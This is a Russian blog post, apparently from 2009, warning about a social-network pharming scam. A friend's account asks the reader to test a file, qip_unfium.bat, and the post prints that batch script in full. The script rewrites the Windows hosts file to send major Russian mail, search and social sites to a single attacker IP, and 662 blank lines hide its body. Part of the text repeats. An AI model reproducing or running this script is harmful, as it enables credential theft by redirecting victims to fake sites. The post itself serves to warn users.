Похоже, началась очередная эпидемия фарминга через социальные сети.
В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
На что человек, конечно же, получает ответ:
И через некоторое время получает следующее сообщение:
(адрес закрыл звёздочками специально, чтоб неповадно было щёлкать:)
Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл
Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
Кстати перед собственно телом скрипта в файле 662 пустые строки.
О последствиях выполнения данного скрипта можно не упоминать.
Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.
UPD от 16 ноября 2009 года: Вторая часть Марлезонского балета. :-)
В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
На что человек, конечно же, получает ответ:
Могу, привет)
И через некоторое время получает следующее сообщение:
urlshort.me** фaйл без oшибoк зaпускaеться?))
(адрес закрыл звёздочками специально, чтоб неповадно было щёлкать:)
Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл
qip_unfium.bat
Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts
Кстати перед собственно телом скрипта в файле 662 пустые строки.
О последствиях выполнения данного скрипта можно не упоминать.
Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.
UPD от 16 ноября 2009 года: Вторая часть Марлезонского балета. :-)